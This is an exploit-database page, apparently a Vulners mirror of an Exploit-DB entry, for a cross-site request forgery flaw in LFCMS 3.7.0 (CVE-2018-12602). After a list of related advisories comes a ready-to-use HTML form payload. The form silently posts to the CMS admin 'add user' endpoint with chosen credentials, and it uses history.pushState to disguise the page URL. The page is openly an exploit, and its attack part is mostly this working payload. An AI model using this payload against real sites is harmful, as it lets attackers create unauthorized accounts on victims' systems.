Lucene search
K

LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)

🗓️ 21 Jun 2018 00:00:00Reported by bay0netType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

A CSRF vulnerability allows arbitrary user addition in LFCMS 3.7.

Related
Code
ReporterTitlePublishedViews
Family
0day.today
LFCMS 3.7.0 - Cross-Site Request Forgery (Add User) Vulnerability
21 Jun 201800:00
zdt
CNVD
LFCMS Cross-Site Request Forgery Vulnerability (CNVD-2018-14218)
26 Jun 201800:00
cnvd
CVE
CVE-2018-12602
25 Jun 201815:00
cve
Cvelist
CVE-2018-12602
25 Jun 201815:00
cvelist
EUVD
EUVD-2018-4561
7 Oct 202500:30
euvd
exploitpack
LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)
21 Jun 201800:00
exploitpack
NVD
CVE-2018-12602
25 Jun 201815:29
nvd
Packet Storm
LFCMS 3.7.0 Cross Site Request Forgery
21 Jun 201800:00
packetstorm
Prion
Cross site request forgery (csrf)
25 Jun 201815:29
prion
# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
# Date: 2018-06-20
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12602


A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.


The payload for attack is as follows.


<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
      <input type="hidden" name="username" value="test222" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password" value="test222" />
      <input type="hidden" name="repassword" value="test222" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Jun 2018 00:00Current
8.8High risk
Vulners AI Score8.8
CVSS 26.8
CVSS 38.8
EPSS0.00262
38